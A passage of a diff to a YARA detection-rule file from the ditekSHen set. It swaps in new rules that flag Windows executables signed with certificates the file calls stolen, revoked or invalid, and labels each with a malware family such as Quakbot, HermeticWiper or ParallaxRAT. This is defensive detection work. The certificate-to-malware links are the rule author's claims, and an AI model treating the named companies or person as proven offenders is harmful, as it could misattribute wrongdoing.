 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ee980353-b7c3-5738-84ae-e51c021e6597"
+		id = "dacde33d-3925-52c6-87fd-9f3ead6bfab0"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1949-L1960"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8686-L8699"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eeb1556808e790eea964658a8499ec2d9cc5638bf696fbbade2bc08a29fb3e65"
+		logic_hash = "64c61d1bb48d790a2a3da85c6e57b542f0ee8a85296fc3e8c17ea18d8241790d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e9a9ef5dfca4d2e720e86443c6d491175f0e329ab109141e6e2ee4f0e33f2e38"
+		thumbprint = "14ffc96c8cc2ea2d732ed75c3093d20187a4c72d02654ff4520448ba7f8c7df6"
+		reason = "HermeticWiper"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DECIPHER MEDIA LLC" and pe.signatures [ i ] . serial == "bc:e1:d4:9f:f4:44:d0:32:ba:3d:da:63:94:a3:11:e9" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Dadf44E4046372313Ee97B8E394C4079 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Da20761Afbb0463C55B1Ea88Bbc7Ec57 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bb7178f4-079f-5f7e-9761-3f73203603c7"
+		id = "63e4b8f6-64f1-58a2-920a-e1d4b113380b"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1962-L1973"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8716-L8729"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4480ad6ce302a87e38915ef7ba09a94a4626ed359333276b899474f21d46238"
+		logic_hash = "a4f6bb9742ab40e8003ea14f9645f0c7f885b461fbeb01164b86ddacbda1113f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "80986ae0d4f8c8fabf6c4a91550c90224e26205a4ca61c00ff6736dd94817e65"
+		thumbprint = "f12dd6e77ffab75870b24dd5bfda5a360843f9e5591e764be9f0a2ac59a710d3"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVER CLOSE s.r.o." and pe.signatures [ i ] . serial == "da:20:76:1a:fb:b0:46:3c:55:b1:ea:88:bb:c7:ec:57" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00F8C2E08438Bb0E9Adc955E4B493E5821 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C51F4Cf4D82Bc920421E1Ad93E39D490 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "75f505d0-c79a-5eab-a61f-29ec238ac045"
+		id = "cbb6cb90-b0f0-5271-81ae-8639c28a5df1"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1975-L1986"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8731-L8744"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2258ea96b56acb3025b5b2f39c07d482c375e75323d6f8e8ded91b8dab00656e"
+		logic_hash = "b9152998eb3c4ba2b6e7571ed03c63ae1ade2f922df6901f8e46b08f41474f7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "459ef82eb5756e85922a4687d66bd6a0195834f955ede35ae6c3039d97b00b5f"
+		thumbprint = "d17dc7ef018e13b9a482b60871e25447fb1ae724dfe69b5287dce6b9b78d84a9"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00D2Caf7908Aaebfa1A8F3E2136Fece024 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_69A72F5591Ad78A0825Fbb9402Ab9543 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "043a598d-8b84-597f-ac2e-035cc9ccef77"
+		id = "a30ca6aa-3bf4-5fa2-8297-7b983410e5d4"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1988-L1999"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8746-L8759"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2c8a322e687ed575e66ff308bcf0950ab87bc5ac3ab561c8cc3d81e9181ac708"
+		logic_hash = "b2a8c08a612f7352a159a9d3f7d9152d9de043db1ec69e4bb2493533453f8f5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "82baf9b781d458a29469e5370bc9752ebef10f3f8ea506ca6dd04ea5d5f70334"
+		thumbprint = "42a6612f4c652b521435989b5f044403649fef6db4fb476f3c4d981dc2f9bdf8"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_003223B4616C2687C04865Bee8321726A8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_8Cece6Df54Cf6Ad63596546D77Ba3581 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "05320823-08e5-58f4-896c-ae7f01b40a3b"
+		id = "c5c19072-5a2f-5851-83bf-25a9e2fd9033"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2001-L2012"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8761-L8774"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "671e3a589fb24a6c5e38126df45a4767815eff32014172930cab6ffbe135af81"
+		logic_hash = "1980b3ef7df1bfa43d401fdd8393cb8ffb5c919d558c23314ffb9e823cf9590d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "321218e292c2c489bbc7171526e1b4e02ef68ce23105eee87832f875b871ed9f"
+		thumbprint = "1a9ff8aba1b24e3bd06442ac6d593ff224b685cba4edef79e740f569ab453161"
+		reason = "Malware"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Db95B22362D46A73C39E0Ac924883C5B : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5e926cb1-efd0-5f9d-9327-341bb2f1a5f5"
+		id = "df60473d-da8a-59c1-84d1-717d52d2411d"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2014-L2025"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8776-L8789"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "312d810386aebb509ffbd09d6b1ad6a761a03bc07ba5e4a158235786063389a9"
+		logic_hash = "29015f6e11f2c93cc12e39cf50a1bda3bd4aa0bb7df0d7374223031361067495"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "be226576c113cd14bcdb67e46aab235d9257cd77b826b0d22a9aa0985bad5f35"
+		thumbprint = "751a7e6c4dbe6e7ca633b91515c9f620bff6314ce09969a3af26d18945dc43b5"
+		reason = "Smoke Loader"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3696883055975D571199C6B5D48F3Cd5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8af62be2-488f-5474-b674-73bf157dff00"
+		id = "8b17b23f-3296-55b2-8e7b-40e13a14a610"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2027-L2038"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8791-L8804"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9232413a071a6100ba806b1fad2cd6cd2bb85351c36ad25cfc31b66ad041d686"
+		logic_hash = "9af0b27e96575298a31b53f6f88cdb20934db75637abdd0acb40bb3c6921542c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "933749369d61bebd5f2c63ff98625973c41098462d9732cffaffe7e02823bc3a"
+		thumbprint = "e386450257e170981513b7001a82fb029f0931e5c2f11c6d9b86660da0b89a66"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aff762E907F0644E76Ed8A7485Fb12A1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6000F8C02B0A15B1E53B8399845Faddf : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "92113fc4-ef5b-5e86-bc8e-baf342ddf276"
+		id = "6d4224bd-1522-5b0f-b39e-1ba4ec0f1a63"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2040-L2051"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8806-L8819"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0be4642f6aaf2183d593240efcc8c2046970d3806a67ff53ca4ce7ee85df90e5"
+		logic_hash = "a8687b2aa02909af5fc7c706f31c419c4af48225abe7415bf262de57bb85258f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7b0c55ae9f8f5d82edbc3741ea633ae272bbb2207da8e88694e06d966d86bc63"
+		thumbprint = "6f18caa7cd75582d3a311dcc2dadec2ed32e15261c1dc5c9471e213d28367362"
+		reason = "Amadey"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5B440A47E8Ce3Dd202271E5C7A666C78 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_F6Ad45188E5566Aa317Be23B4B8B2C2F : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "62c9a37c-e4dd-5925-a019-08bf6a77476d"
+		id = "d4afb6ed-1cfd-5c49-8959-0cf136d0e9f0"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2053-L2064"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8821-L8834"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f898a3495e173d85fd62598da87ab15cbee0674519231a5e770204a4db3cd93f"
+		logic_hash = "7afafea141727e2ed4c1975a18aa77b282c7d9ece5729dbd96cbb49cc2b393f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "07e4cbdd52027e38b86727e88b33a0a1d49fe18f5aee4101353dd371d7a28da5"
+		thumbprint = "ae7db8b64e8abd9d36876f049b9770d90c0868d7fe1a2d37cf327df69fa2dbfe"
+		reason = "Numando"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gary Kramlich" and pe.signatures [ i ] . serial == "f6:ad:45:18:8e:55:66:aa:31:7b:e2:3b:4b:8b:2c:2f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fe41941464B9992A69B7317418Ae8Eb7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_74Fc9257Bc86F8C618501695Ad4B1606 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "44626304-7f68-5d3a-81b4-91ee0bd09cc3"
+		id = "c0ed5369-ca51-50b8-941a-580262b4f644"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2066-L2077"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8836-L8849"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "713a2cfc95b83de71064e198b26b716790c7cf21674961720695ab6749cb2ad1"
+		logic_hash = "d6a9956d8bcc717186c205d07b94df1df4818bee58f98bdc128ec569331ab5e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef4da71810fb92e942446ee1d9b5f38fea49628e0d8335a485f328fcef7f1a20"
+		thumbprint = "8ebbb2ab8f2e1366d0137e5026e07fde229f45f39d043c7ad36091b8eb2a923e"
+		reason = "ParallaxRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "169Teaco Limited" and pe.signatures [ i ] . serial == "74:fc:92:57:bc:86:f8:c6:18:50:16:95:ad:4b:16:06" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_29128A56E7B3Bfb230742591Ac8B4718 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3B0914E2982Be8980Aa23F49848555E5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "58a9e9f1-531b-5dee-aa11-1537838e9d3f"
+		id = "bda3e8b2-5d1b-5898-a4c3-318fc88506b8"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2079-L2090"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8851-L8864"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "16c9843b5e3edafa64e07626fda494452efa5d0bcaa80d7d80683258c2b9acd4"
+		logic_hash = "b1ced5176720e0a3bd475172a167675de8211987fbae11b93eab1fba6b3629f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f9fcc798e1fccee123034fe9da9a28283de48ba7ae20f0c55ce0d36ae4625133"
+		thumbprint = "254e59ea93fa5f2a6af44f9631660f7b6cca4b4c9f97046405bcfed5589a32fa"
+		reason = "ParallaxRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C2Bb11Cfc5E80Bf4E8Db2Ed0Aa7E50C5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_029Bf7E1Cb09Fe277564Bd27C267De5A : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d22ee868-71a7-52f4-93f3-b04b105fd399"
+		id = "19d1012f-9a9e-5d84-885c-2571bfd1876c"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2092-L2103"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8866-L8879"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e54eeea70e85396b26fe188b848ef37c619aae5fc909c1a06ad0bc42fb9b0468"
+		logic_hash = "a8c817dc99d55dcbea31334cc10b6a7ae3b5cf831e28cb2daf9d4b06fb4bec60"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f1044e01ff30d14a3f6c89effae9dbcd2b43658a3f7885c109f6e22af1a8da4b"
+		thumbprint = "2b18684a4b1348bf78f6d58d3397ee5ca80610d1c39b243c844e08f1c1e0b4bf"
+		reason = "Lazarus"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rooth Media Enterprises Limited" and pe.signatures [ i ] . serial == "00:c2:bb:11:cf:c5:e8:0b:f4:e8:db:2e:d0:aa:7e:50:c5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_040Cc2255Db4E48Da1B4F242F5Edfa73 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_984E84Cfe362E278F558E2C70Aaafac2 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4673a61f-1c2b-5f92-af28-d55b5d913784"
+		id = "3d071d42-b96a-5491-96f5-4605b6b5584e"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2105-L2116"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8881-L8894"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ade204ebb2bf26515984d20ae459aaea56136acfd37a54abc794969fd05c54ce"
+		logic_hash = "a3a42c5b6ad094deb2a9f33789b6f7e52f76e65b2336372341f16389cef40f88"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1270a79829806834146ef50a8036cfcc1067e0822e400f81073413a60aa9ed54"
+		thumbprint = "0b2d1dad72c69644f80ad871743878b5eb1e45e451d0d2c9579bdf81384f8727"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Softland SRL" and pe.signatures [ i ] . serial == "04:0c:c2:25:5d:b4:e4:8d:a1:b4:f2:42:f5:ed:fa:73" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights Äkäslompolo Oy" and pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_45245Eef53Fcf38169C715Cf68F44452 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "decdae98-333f-58b3-8c48-b997da5fc3f3"
+		id = "3e92744d-1eb8-511a-b933-6dbe1e74fcfd"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2118-L2129"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8896-L8909"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9981e0aed672ebfcbe7f0bc1eee6a26a1523b8577d5ee572612aaebf23d1fbcf"
+		logic_hash = "7667563aa02be9a85ba286bc16eb37380d5988b32f0ce27b1dbd9ae18b8b9175"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "45d598691e79be3c47e1883d4b0e149c13a76932ea630be429b0cfccf3217bc2"
+		thumbprint = "ad7edb1b0a6a1ee3297a8825aff090030142dce8b59b9261bc57ca86666b0cbe"
+		reason = "QuakBot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_091736D368A5980Ebeb433A0Ecb49Fbb : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0406C4A1521A38C8D0C4Aa214388E4Dc : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
